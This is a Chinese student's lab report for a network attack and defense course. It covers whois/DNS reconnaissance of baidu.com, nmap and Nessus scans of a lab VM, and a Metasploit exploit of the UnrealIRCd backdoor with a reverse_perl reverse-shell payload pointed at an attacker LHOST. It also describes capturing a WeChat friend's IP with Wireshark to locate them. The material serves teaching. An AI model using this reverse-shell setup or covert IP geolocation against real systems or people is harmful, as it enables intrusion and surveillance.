首页 > 其他分享 >20222423 2024-2025-1 《网络与系统攻防技术》实验五实验报告

20222423 2024-2025-1 《网络与系统攻防技术》实验五实验报告

时间:2024-11-20 19:32:58浏览次数:1  
标签:漏洞 主机 使用 端口 2024 2025 20222423 IP地址 靶机

1.实验内容

1.2 实验任务

(1)从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取如下信息:

  • DNS注册人及联系方式

  • 该域名对应IP地址

  • IP地址注册人及联系方式

  • IP地址所在国家、城市和具体地理位置

PS:使用whois、dig、nslookup、traceroute、以及各类在线和离线工具进行搜集信息(要求必须用WHOIS、dig、nslookup、traceroute、tracert以及在线工具)

(2)尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置。

(3)使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

  • 靶机IP地址是否活跃

  • 靶机开放了哪些TCP和UDP端口

  • 靶机安装了什么操作系统,版本是多少

  • 靶机上安装了哪些服务

(4)使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。

  • 靶机上开放了哪些端口

  • 靶机各个端口上网络服务存在哪些安全漏洞

  • 你认为如何攻陷靶机环境,以获得系统访问权

2. 实验过程

2.1 从www.besti.edu.cn、baidu.com、sina.com.cn中选择一个DNS域名进行查询,获取一系列信息

目的域名:baidu.com

首先打开kali

(1)使用whois命令

whois besti.edu.cn

之后不管是nslookup还是traceroute等命令,都无法收缩到和学院官网有关的信息,说明学院可以对官网进行了保护。。

所以只能换个攻击目标了

whois baidu.com

从上面信息我们不难看到

  • DNS注册人:MarkMonitor Inc.

  • 邮箱:[email protected]

  • 联系电话:+1.2086851750

  • 国家:中国

(2)使用nslookup命令

nslookup baidu.com

可以发现有两个IP地址

  • IP地址1:39.156.66.10

  • IP地址2::110.242.68.66

有了这两个IP地址,那么在详细看一下每一个IP的信息

查询 39.156.66.10

whois 39.156.66.10

可以看到这个IP的信息

  • IP地址注册人:haijun li

  • 邮箱:[email protected]

  • 地址: 29,Jinrong Ave, Xicheng district,beijing,100032

  • 联系电话: +86 1052686688

此外还有传真,所在国家等等信息,这里不在列举,图上都可以看出

查询 110.242.68.66

whois 110.242.68.66

从这里也能看到相应的信息

  • IP地址注册人:Kong Lingfei

  • 邮箱:[email protected]

  • 地址: 45, Guang An Street, Shi Jiazhuang City, HeBei Provin

  • 联系电话: +86-311-86681601

同样这里还有许多其他信息,这里不再列出

(3)使用dig命令

dig baidu.com

可以看到得到的信息和前面相吻合,得到的两个IP地址和使用nslookup查询得到的一致

(4)使用traceroute命令

命令介绍:raceroute是一种网络诊断工具,它用于跟踪数据包从源主机到目标主机所经过的路由路径。该命令可以显示每一跳的延迟,帮助网络管理员或用户识别网络连接中的问题所在,例如延迟过高、路由故障或数据包丢失。Traceroute通过发送带有递增生存时间(Time To Live, TTL)值的数据包来工作,当数据包到达其TTL值减至零的路由器时,该路由器会丢弃数据包并发送一个ICMP超时消息回源主机,Traceroute随后记录下这个路由器的信息

traceroute baidu.com

不过很可惜,没法看到数据包经过了哪些路由信息

(5)使用tracert命令

tracert实在windows下使用的

没想到使用自己win主机的时候能够很清楚的看到数据包走的路径,最后到达IP地址为39.156.66.10,也就是刚才查询得到的IP地址之一
出发的第一个路由为192.168.50.1,也就是我们宿舍的网关地址IP。

(6)使用在线网站查询

在线工具在这里

查询结果如下:

下来查询域名地址,工具在这

可以看到和之前搜索查询得到的信息基本一致。

2.2 尝试获取BBS、论坛、QQ、MSN中某一好友的IP地址,并查询获取该好友所在的具体地理位置

使用微信电话,给我的某一微信好友拨打

然后通过wireshark抓包

可以看到发送了大量UDP包,那么这个目的IP就是我好友的IP了

使用网站查询IP所在地,网站在这里,好友IP为 119.167.156.31

可以看到查询到的IP属地为 山东 青岛

而我好友也确实在这里

2.3 使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

目标主机IP:

2.3.1 主机扫描

nmap -sP 192.168.50.0/24

使用ping扫描,探测网段下设备活跃情况

可以找到我的主机

nmap -sN 192.168.50.29

看到目标主机确实活跃

2.3.2 端口扫描

考虑到信息安全,这里改用扫描自己的虚拟机,IP地址如下

nmap -sU -sT 192.168.50.29

/ 其中-sT代表扫描TCP端口 /

/ -sU代表扫描UDP端口 /

扫描结果如下

时间有亿点点长。。。

2.3.3 扫描操作系统,版本

nmap -O 192.168.116.133

可以看到是95% Oracle Virtualbox,90% QEMU这里看不出版本

2.3.4 靶机安装了哪些服务

可以看到有些应用服务的版本是存在漏洞的,也为后面的攻击买下伏笔。

2.4 使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令。靶机上开放了哪些端口;靶机各个端口上网络服务存在哪些安全漏洞;你认为如何攻陷靶机环境,以获得系统访问权。

2.4.1 nessus安装

注意:下面的步骤按道理是能够成功安装Nessus的,但由于我的个人操作导致安装失败,如果想参考后面如何成功安装的请看 问题及解决 部分

在kali中使用火狐浏览器访问官网下载,最后得到的是一个.deb文件
下载链接

随后找到deb压缩包,解压并启动nessus服务

可以看到,服务对应的端口为8834,在kali用火狐访问此端口

可以看到网站说明Nessus服务启动成功

下来需要去获得一个激活码,访问这个网站

这里需要输入用户名和邮箱,提交后会收到一封邮件,里面就是要用到的激活码,注意邮箱一定得是在使用的,否则无法接收到邮件!!

收到的邮件如下:

然后还需要获取一个challenge值,命令如下

随后使用获得到的激活码和challenge值,访问官网,获得nessus核心框架和证书的下载

提交认证成功后,就会下载两个文件,也就是证书和核心框架

这里我为了方便,将这两个文件拷贝到了nessus的目录之下

随后进入nessus的目录之下,输入命令更新nessus框架和证书

这个过程还是要不少时间的,要耐心等待

随后更新软件和插件

然后再次重启服务,进入nessus的官网

后面这部分我的nessus出现了严重错误,详见 问题与解决部分, 这里我搜了很多教程,一般而言重启后进入官网选择“Managed Scanner -> Tenable Security Center” 然后会让你创建一个账户输入密码,提交后就可以进入,但是这里无论我怎么输入账户都不通过,卡了好久

一直被挡在这个界面,创建什么账号都不能通过

最后我搜到可以通过修改文件添加账户直接登录,然后我就试了,结果全完了
重启nessus服务后再次访问官网

丸辣 T - T.. 这个问题我上网查基本没有解决方法,我也尝试了好久还是这个界面,nessus被我整坏了。。。

所以后面nessus使用的内容只能想别的办法了(T _ T),详情请看 问题及解决 部分

所以永远不要随便使用命令改动

2.4.2 对靶机环境进行扫描,回答问题并给出操作命令。

(1)靶机开放了哪些端口?

首先点击New Scan

然后点击Host Discovery

输入目标靶机的IP :192.168.116.133

然后需要等待一阵子,最后会看到下面的结果

可以看到目标靶机开放的端口还不少。。

有 21、22、23、25、53、69、80、111......(由于太多这里不在列出来,图上都可以看到)

(2)靶机各个端口上网络服务存在哪些安全漏洞

还是新建New Scan,此时选择Basic Network Scan,然后输入目标靶机IP:192.168.116.133

等待了一阵子时间后,就会出现下面的结果

emm,看来这个靶机的安全隐患还不少,有10个critical漏洞,7个high漏洞,26个medium漏洞和9个low漏洞。。。。。。细细查看漏洞有那些

列出来不少,这里挑几个最严重的

443端口,Samba Badlock Vulnerability

描述信息告诉我们该主机上运行的SamBa版本存在一个称为Badlock的缺陷,原因是远程过程调用(RPC)通道上的身份验证级别协商不正确。能够拦截托管SAM数据库的客户端和服务器之间通信的中间人攻击者可以利用此缺陷强制降低身份验证级别,从而允许在被拦截用户的上下文中执行任意Samba网络调用,例如查看或修改Active Directory(AD)数据库中的敏感安全数据或禁用关键服务。

查询了相关资料,结果如下

漏洞编号:CVE-2016-2118

恰好实验六中使用了SambaMS-RPC Shell命令注入漏洞并成功获取到目标主机的shell

6667端口:UnrealIRCd Backdoor Detection

扫描结果告诉我们,该主机远程IRC服务器是一个带有后门的UnrealIRCd版本,允许攻击者在受影响的主机上执行任意代码。

漏洞编号:CVE-2010-2075

513端口:rlogin Service Detection

描述:目标主机上正在运行rlogin服务。此服务易受攻击,因为数据是以明文形式在rlogin客户端和服务器之间传递的。中间人攻击者可以利用此漏洞探查登录名和密码。此外,它可能允许在没有密码的情况下进行身份验证不佳的登录。如果主机容易受到TCP序列号猜测(来自任何网络)或IP欺骗(包括本地网络上的ARP劫持)的攻击,那么就有可能绕过身份验证。
最后,rlogin是一种通过.rhosts或rhosts.equiv文件将文件写入访问转换为完全登录的简单方法。

说明我们可以较为容易得对目标实施中间人攻击

一会可以使用kali实践一下这个漏洞

5900端口:VNC Server 'password' Password

描述:目标主机上运行的VNC服务器使用弱密码进行保护。Nessus能够使用VNC身份验证和密码“password”登录。未经身份验证的远程攻击者可以利用此漏洞控制系统。

说明这里使用了弱密码,不安全

  • VNC服务介绍:VNC(Virtual Network Computing)是一种图形桌面共享系统,它允许用户通过网络远程控制另一台计算机的桌面环境。VNC工作原理是通过RFB(Remote Framebuffer)协议,将被控计算机的屏幕内容压缩后传输给控制端,同时将控制端的鼠标和键盘输入等操作实时回传给被控计算机,实现远程桌面的实时交互。

说明只要客户端安装了VNC软件,输入服务器的IP地址和VNC端口号后,可以很容易猜测出密码,进而实现控制。

53端口:ISC BIND Service Downgrade / Reflected DoS

描述:根据其自我报告的版本,在远程名称服务器上运行的ISC BIND 9实例受到性能降级和反射DoS漏洞的影响。这是由于BIND DNS没有充分限制在处理转介响应时可能执行的获取次数。
未经身份验证的远程攻击者可以利用此漏洞降低递归服务器的服务,或将受影响的服务器用作反射攻击中的反射器。

这个漏洞我搜索了相关资料,如下

漏洞编号: CVE-2020-8616

(3)你认为如何攻陷靶机环境,以获得系统访问权

从Nessus的扫描结果看,目标靶机存在许多漏洞,我只是列举了一部分内容。。
不愧是实验用的靶机,刚好存在许多漏洞

  • 针对 VNC Server 'password' Password 漏洞,可以在攻击方下载VNC服务软件,破解目标主机的若口令,进而获取控制权

  • 针对 Samba Badlock Vulnerability 漏洞,攻击者能够拦截托管SAM数据库的客户端和服务器之间通信的中间人攻击者可以利用此缺陷强制降低身份验证级别,从而允许在被拦截用户的上下文中执行任意Samba网络调用,例如查看或修改Active Directory(AD)数据库中的敏感安全数据或禁用关键服务。

  • 针对CVE-2010-2075漏洞,光说不练不行,刚好有手头的环境,亲自实践一下

首先搜索该漏洞信息,查找可用的模块

查看目标主机对应的应用是否存在该漏洞(NESSUS已经扫描出有了,只是走个流程)

然后使用这个漏洞模块,配置命令

set RHOSTS 192.168.116.133

set LHOST 192.168.56.107

set payload cmd/unix/reverse_perl

额截图可能有点坎坷。。但是参数配置确实是这样的

然后exploit执行

可以看到成功获取到主机权限

通过命令验证,成功实现了远程执行命令,成功攻击目标主机!

2.5练习使用搜索引擎搜集信息

2.5.1 通过搜索引擎搜索自己在网上的足迹,并确认自己是否有隐私和信息泄漏问题

在浏览器输入姓名搜索

额结果偏离的有点多,我怎么成了退伍老兵了?(不是),不过至少说明我的有关信息没有泄露

加上学号

依旧没有有关信息,按道理说会出现我撰写的博客,但考虑到我使用了昵称,所以搜索不到

2.5.2练习使用Google hack搜集技能完成搜索

(1)查找pdf文件

filetype: 搜索特定文件类型的文档

filetype:pdf

可以看到提供的都是pdf格式的文件

(2)查找特定的网站

site: 限定搜索范围在特定网站内

site:besti.edu.cn

可以看到网页内容都被限制在了电科院官网内的网站

(3)查找标题中有多个特定关键词的网页

allintitle: 同时搜索多个关键词在标题中出现的页面。

allinitle:美国 总统大选

趁着最近美国大选刚结束,就用这个作为关键词

当然英文也可以

allinitle:US presidential election

(4)查找某个词的定义

define: 搜索某个词语的定义。

define:president

(5)查找和某个网站相关的网站

related: 查找与特定网址相关的其他网站。

related:bilibili.com

(6)查找允许目录浏览的页面

Index of: 查找允许目录浏览的页面。

index of:music

(7) 查找正文中含有特定关键词的网页

allintext: 同时搜索多个关键词在页面正文中出现的页面。

allintext:science cloud

(8) 查找url中包含特定关键词的网站

allinurl: 同时搜索多个关键词在URL中出现的页面。

allinurl:science news

(9) 查找返回到某个连接的网站

link: 查找链接到特定网址的页面。

link:baidu.com

(10) 查找某个指定网址的相关信息

info: 查找指定网址的信息。

info:www.bilibili.com

3. 问题及解决方案

  • 问题一:Nessus 安装失败,软件被弄坏

可惜了,最后只能在windows端下载,才解决了这个问题,但其中的下载步骤还有一点不一样

首先在官网下载windows版本,安装很简单,一路默认,除了安装位置换一下就行

然后进入 https://localhost:8834/ 进入官网

先别急着勾选这里的Rigister Offline,直接点击Continue,然后会进入这个界面

这里注意!!!,选择Rigister for Nessus Essentials这一项。

代表使用基础版本就行,使用这个就不用下载证书更新框架等等复杂操作
然后随便输入用户名和邮箱

随后等一会会生成一个激活码,然后使用,就会进入初始化界面

随后初始化后就会进入这样的界面

(windows端界面也是这样子,由于没截图,用kali里面的表示一下)

这里就会下载插件,要等好久的时间,而且非常占用CPU

等待好久好久之后,就可以安装完成直接使用了!!!

所以有时候不一定非得在虚拟机上下载软件,路走不通的时候也可以使用windows端下载。。。

4.学习感悟、思考等。

  • 首先这次实验让我学会了许多有关信息搜集的方法,不管是使用IP地址查询网站,还是使用nmap扫描目标主机,或是使用goole hacking搜索相关信息,以及利用Nessus软件扫描目标主机的漏洞,如果作为渗透测试方,这些得到的信息将有助于我们分析目标主机的安全性以及存在哪些安全隐患,从而进行对应的漏洞修补,是保障安全的一件利器;当然如果对于黑客,那么将大大提高成功攻击的概率,当然这也就是网络攻防这门课的意义所在。

  • 实验过程中的难点就是Nessus软件的安装,这个软件的安装真的折磨了我好久,在kali端下载的时候我还不小心将整个软件损坏,自己能力不足也没法修复,最后只能在windows端下载一个软件进行漏洞扫描了o(╥﹏╥)o,而这也给我了一个教训,一定要做好备份,不然只能重头开始

5.参考资料

标签:漏洞,主机,使用,端口,2024,2025,20222423,IP地址,靶机
From: https://www.cnblogs.com/20222423lpy/p/18539023

相关文章

  • 学期2024-2025-1 学号20241424 《计算机基础与程序设计》第9周学习总结
    学期2024-2025-1学号20241424《计算机基础与程序设计》第9周学习总结作业信息|这个作业属于2024-2025-1-计算机基础与程序设计||-- |-- ||这个作业要求在2024-2025-1计算机基础与程序设计第九周作业)||这个作业的目标|<参考上面的学习总结模板,把学习过程通过博客(随笔)发表......
  • 佛山市华英学校 CSP-J/S2024 获奖情况总表(公开信息)
    比赛奖项姓名年级学校分数省份性别备注CSP2024入门三等奖程曦初一佛山市华英学校100广东男CSP2024入门三等奖方卓强初一佛山市华英学校110广东男CSP2024提高三等奖方卓强初一佛山市华英学校70广东男CSP2024入门三等奖井晨羽......
  • 2024.11.20 NOIP模拟 - 模拟赛记录
    异或(xor)每次所加三角形的范围如图所示:这道题做法较多,我是通过两组差分与前缀和来做的。首先需要一个三角形差分,使每一次在差分数组中修改时,影响到的范围是一个三角形,比如这样(红色点为\((x,y)\),即\((r,c)\)):假设我们真正需要修改的三角形是橙色部分:那么联系到正常差分,很容......
  • [CSP-S 2024] 染色
    还是决定把这个题做了考场上设计的状态,推了一个小时没推出来下午推了一会,发现这是个刷表状态,填表没法做,转移无处下手但是考CSP的时候我貌似并不知道什么叫刷表设\(f_{i,j,k}\)表示当前到\(i\),上一个填的红色位置在\(j\),蓝色位置在\(k\),暴力刷表转移是3D/0D的,需要排......
  • 实时多模态 AI 的 N 种新可能丨实时互动和大模型专场@RTE2024回顾
      在本届RTE2024大会上,来自产业界和学术界的多位专家深入探讨了实时互动和大模型技术的最新进展及其潜在应用。 西湖心辰联合创始人俞佳、声网AI算法工程师乔齐、MiniMax资深音频算法专家张博闻、商汤科技数字文娱解决方案负责人焦文奎以及面壁智能算法VP翟忠武等......
  • 2024.11.20总结
    本文于github博客同步更新。A:一个数可以被操作当且仅存在一列的顶部元素为它且存在一列的底部元素为它,初始扫一遍,将合法的元素以顶部所在列为关键字扔到小根堆里,每次找到最小的元素添加,然后检查将新露出来的元素是否存在匹配,若结束时未填完即为无解。B:要么在非环边上砍一刀,......
  • NOIP2024 前集训:NOIP2024加赛 6
    前言music《身骑白马》我爱谁跨不过从来也不觉得错自以为抓着痛就能往回忆里躲偏执相信着受诅咒的水晶球阻挡可能心动的理由而你却靠近了逼我们视线交错原地不动或向前走突然在意这分钟眼前荒沙弥漫了等候耳边传来孱弱的呼救追赶要我爱的不保留......
  • 《技术规划与技术平台开发管理赋能》公开课(2024年12月20-21日)
    【课程背景】随着国内外高科技领域的产品竞争越来越激烈,产品和解决方案的创新尤其是核心技术的自主创新已成为中国企业乃至整个中国商业社会转型的重要手段。公司的技术战略是基于战略高度对产品机遇和技术发展趋势的前瞻性认识,如果没有这种前瞻性的认识,产品、平台和技术就会在......
  • 2024源鲁杯部分wp
    pwn[Round1]giaopwnexp:#-*-coding:utf-8-*-frompwnimport*#fromLibcSearcherimport*#p=process("./pwn")p=remote("challenge.yuanloo.com",24519)elf=ELF("./pwn")#libc=ELF("./libc.so.6")context......
  • 哋它亢:2024datacon SEO
    哋它亢是一种新兴的技术,它来源于datacon2024的SEO赛题,作为其关键词给出。哋它亢作为一种新时代的朝阳产业,其结合了大数据与人工智能技术,通过添加大量机器学习算法,以实现高效的产出。哋它亢专栏文章列表:哋它亢:datacon2024SEO哋它亢:一种新兴SEO技术的datacon-1哋它亢:一种新......